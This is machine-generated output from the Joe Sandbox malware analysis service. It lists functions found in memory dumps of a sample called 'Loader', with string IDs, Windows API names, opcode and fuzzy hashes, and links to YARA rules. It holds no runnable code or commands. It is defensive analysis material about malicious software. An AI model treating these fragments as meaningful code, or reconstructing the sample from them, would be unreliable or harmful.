                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0$8
                                                                                        • API String ID: 0-46163386
                                                                                        • Opcode ID: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                        • Instruction ID: b632590525e39ce5a857bdb2105f3f6bf93eafba229eb97f7c3f587b0413ca56
                                                                                        • Opcode Fuzzy Hash: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                        • Instruction Fuzzy Hash: B17245716083409FDB14CF18C884BABBBE1EF84314F04892EF9899B391D779D949CB96
                                                                                        Function 00430161 Relevance: 3.1, APIs: 2, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit
                                                                                        • String ID:
                                                                                        • API String ID: 2610073882-0
                                                                                        • Opcode ID: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                        • Instruction ID: 6ba9ae55c9c609b8c98ae8d3013d17b988d2f3c8137f657ab236dd5297d85bd1
                                                                                        • Opcode Fuzzy Hash: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                        • Instruction Fuzzy Hash: E7515D61208FC18ED321CB388848387BFD26B67214F498A9CD1FE8B3D6DB756549C762
                                                                                        Function 00414170 Relevance: 3.1, Strings: 2, Instructions: 599COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: K%$wY
                                                                                        • API String ID: 0-861939988
                                                                                        • Opcode ID: 4c105dcb673ca409fed3b26638ef582e7e71751691f37f625785e2df2b92ac95
                                                                                        • Instruction ID: 972d4f943efe6639fd8cdc6de93a4f537478db6c0949f012f7129216f2549232
                                                                                        • Opcode Fuzzy Hash: 4c105dcb673ca409fed3b26638ef582e7e71751691f37f625785e2df2b92ac95
                                                                                        • Instruction Fuzzy Hash: 17E144B55183008BD3149F28D8917ABB3E0FFD6314F19892EE8C597391E738D986C79A
                                                                                        Function 004042D0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )$IEND
                                                                                        • API String ID: 0-707183367
                                                                                        • Opcode ID: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                        • Instruction ID: 9e91746e592093abc6b78d22eaac013f7dd1cf175606ed20a1766aa15e76428f
                                                                                        • Opcode Fuzzy Hash: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                        • Instruction Fuzzy Hash: 03D1BFB1A083449FD710DF14D84575BBBE4ABD4308F14492EFA99AB3C2E379E904CB96
                                                                                        Function 0043F280 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: e>3@$i>3@
                                                                                        • API String ID: 2994545307-675609054
                                                                                        • Opcode ID: 1779fb8af645c331d5a66977d562ed93066847e2f24aa5bb139e768eaa31bd98
                                                                                        • Instruction ID: d63809bf3076d72f070bdb060dff65e02fc893e24afa0153ad856657245a98a7
                                                                                        • Opcode Fuzzy Hash: 1779fb8af645c331d5a66977d562ed93066847e2f24aa5bb139e768eaa31bd98
                                                                                        • Instruction Fuzzy Hash: 83A1F436A083119BC724DF18C88092BB7E2FF9C710F19947DE8869B365DB35AC55CB86
                                                                                        Function 00415EDC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !LDw$D
                                                                                        • API String ID: 0-631248872
                                                                                        • Opcode ID: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                        • Instruction ID: 7e09ab24442d4b71b88b13391f34237f2dfc9f095084ee9819a17599225fc662
                                                                                        • Opcode Fuzzy Hash: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                        • Instruction Fuzzy Hash: BCA1A1B0118340CFD724DF24C8A1BABBBF1FF96305F09595DE48A4B2A2E7798945CB46
                                                                                        Function 00424280 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: bBB$rBB
                                                                                        • API String ID: 0-3277761424
                                                                                        • Opcode ID: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                        • Instruction ID: be6856a020535e4a6e683abf22a1b7757c0c9bd1d2ca0ad35f5e609e3485cc7a
                                                                                        • Opcode Fuzzy Hash: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                        • Instruction Fuzzy Hash: 83713579A0C3409FD724CF18EC41BABB7E4EB86308F50493EF59997282D774A905CB96
                                                                                        Function 00419BFF Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _q0s$gfff
                                                                                        • API String ID: 0-1196501146
                                                                                        • Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                        • Instruction ID: 9ac1f0c1fc7a49e8154fcc72e3c80d4cb5b55f6ce251fccbb0b8a1824a22e975
                                                                                        • Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                        • Instruction Fuzzy Hash: 3E71B2726093508BC724DF25C8622EB77E2FFD5364F188A2DD8998B395E7388941C786
                                                                                        Function 0042A0E0 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gy${
                                                                                        • API String ID: 0-2069607922
                                                                                        • Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                        • Instruction ID: 431e554adce80ef47d4d1f40f80e38f5c8695c8e2ce9c58edc59fdf38191c638
                                                                                        • Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                        • Instruction Fuzzy Hash: 3331FFB02883948FD3508F119C80B6FBBF1FBC6714F149A6CE6D1AB291C77990468B0A
                                                                                        Function 00EF1000 Relevance: 2.5, Strings: 1, Instructions: 1213COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: bmy
                                                                                        • API String ID: 0-4149787075
                                                                                        • Opcode ID: 61d022077e6a2341986c098e972a1cb8eef2a13e135f4d275527c5a816620eb6
                                                                                        • Instruction ID: f5ab0193b59fe8e79b319db8544de2e2decb58f69456fbb9bb30fc882693dbd0
                                                                                        • Opcode Fuzzy Hash: 61d022077e6a2341986c098e972a1cb8eef2a13e135f4d275527c5a816620eb6
                                                                                        • Instruction Fuzzy Hash: 76C25676D022698FCB18DFA9D4921ECBBF1FF68314B14816AD4A5E7784E3385A81CF50
                                                                                        Function 0043B100 Relevance: 2.0, Strings: 1, Instructions: 734COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: f
                                                                                        • API String ID: 2994545307-1993550816
                                                                                        • Opcode ID: c7c0c1f47888a00f76dfdd9b993ea855ebbf2e381001f44f89dc36debc6416fd
                                                                                        • Instruction ID: fe604cc3133df0d3ef17166e2c6d21145ffaf46a9ca28f7e45b4cb97c9031a62
                                                                                        • Opcode Fuzzy Hash: c7c0c1f47888a00f76dfdd9b993ea855ebbf2e381001f44f89dc36debc6416fd
                                                                                        • Instruction Fuzzy Hash: 632213756083418FD714CF19C880B2BB7E2EBC9318F199A6EE595873A1D734EC01CB96
                                                                                        Function 0043D980 Relevance: 2.0, Strings: 1, Instructions: 709COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
                                                                                        • Instruction ID: cc3b19862de00450c502d71b80b37b6a0facead2af28862af59a70b515e96c0c
                                                                                        • Opcode Fuzzy Hash: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
                                                                                        • Instruction Fuzzy Hash: EA22F479B18111CFCB08CF38E8906AAB7A2FF8A315F1985BDD54697395C7349852CB44
                                                                                        Function 0043DA80 Relevance: 1.9, Strings: 1, Instructions: 609COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
                                                                                        • Instruction ID: 7582ed78cd08e368e7f7bf7a7ebd23f02f26f556a500b2e852d8dce14501ab51
                                                                                        • Opcode Fuzzy Hash: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
                                                                                        • Instruction Fuzzy Hash: EE02F339B18211CFCB08CF38E8906AAB7B2FF8A315F1989BDD54697395C7349842CB44
                                                                                        Function 011CF711 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,011CF70C,?,?,00000008,?,?,011CF30F,00000000), ref: 011CF93E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID:
                                                                                        • API String ID: 3997070919-0
                                                                                        • Opcode ID: 70031fc36e5d33b4dfa49f389e82c6349f1e198425c5f3dab4e7705bf089505f
                                                                                        • Instruction ID: 2bdad6668afa3a5aaddd90eea9fb85881586f42832ba92e25a44ecb80c80b042
                                                                                        • Opcode Fuzzy Hash: 70031fc36e5d33b4dfa49f389e82c6349f1e198425c5f3dab4e7705bf089505f
                                                                                        • Instruction Fuzzy Hash: 16B16C3161060A9FEB19CF2CC48ABA57FA1FF15764F25865CE999CF2A1C335D982CB40
                                                                                        Function 011C4A55 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 011C4A6B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 2325560087-0
                                                                                        • Opcode ID: fa33ad3d69aef539fd0b8ca3bead3655fb4b406a62f9a2a97dbf59b91084de55
                                                                                        • Instruction ID: 34d989726f1e9d5d23f47a0493165737d3791f33d8df0aac758ce42d3498d033
                                                                                        • Opcode Fuzzy Hash: fa33ad3d69aef539fd0b8ca3bead3655fb4b406a62f9a2a97dbf59b91084de55
                                                                                        • Instruction Fuzzy Hash: A8A188B5A066458FDB2CCF68D4917ADBBB0FB59728F14816ED525E77C8C334A880CB50
                                                                                        Function 0043DBF0 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
                                                                                        • Instruction ID: f391942a458117ab2eff221fcfc61aedbfa58ea332473f0907b71af19172290f
                                                                                        • Opcode Fuzzy Hash: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
                                                                                        • Instruction Fuzzy Hash: 89E1E239B18211CFCB08CF29D8916AEB7B2FF8A315F1986BDD50697395C7349852CB84
                                                                                        Function 0041D200 Relevance: 1.7, Strings: 1, Instructions: 475COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: pq
                                                                                        • API String ID: 0-1239689891
                                                                                        • Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                        • Instruction ID: 500f681a5dc29514dd64ddcd126b613fb850ea0849f1361138090b14647004ae
                                                                                        • Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                        • Instruction Fuzzy Hash: 3FC1F1B5A183108BD724CF28C8917ABB3F2EF95314F08892DE8C58B395E738D945C75A
                                                                                        Function 0043DC80 Relevance: 1.7, Strings: 1, Instructions: 454COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                        • Instruction ID: 13288392fc325517df86cad4ade3bbe7b083210dd55d9389e011795523972a75
                                                                                        • Opcode Fuzzy Hash: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                        • Instruction Fuzzy Hash: A1D1E236B18211CFCB08CF29D8916AEB7B2FB8A315F1986BDD54697395C7349C02CB94
                                                                                        Function 0043DD00 Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                        • Instruction ID: c02c92b643ec8d6061b0b585771056a8a7c41fa14bd75fb70af057f1c39578d8
                                                                                        • Opcode Fuzzy Hash: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                        • Instruction Fuzzy Hash: 86D1F135A18215CFCB08CF39D8912BEBBB2FB8A315F1986BDD44297381C7349802CB94
                                                                                        Function 00438F45 Relevance: 1.7, Strings: 1, Instructions: 418COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :
                                                                                        • API String ID: 0-336475711
                                                                                        • Opcode ID: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                        • Instruction ID: 45885d3b4d1d012f206d53a257d01764ec68dfae15cf9f6058a92df6a7d4df09
                                                                                        • Opcode Fuzzy Hash: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                        • Instruction Fuzzy Hash: C3D1483AA24222CBCB148FB8D9411AFB3B1FF4A311F1A8879C941A7394D7799D52C794
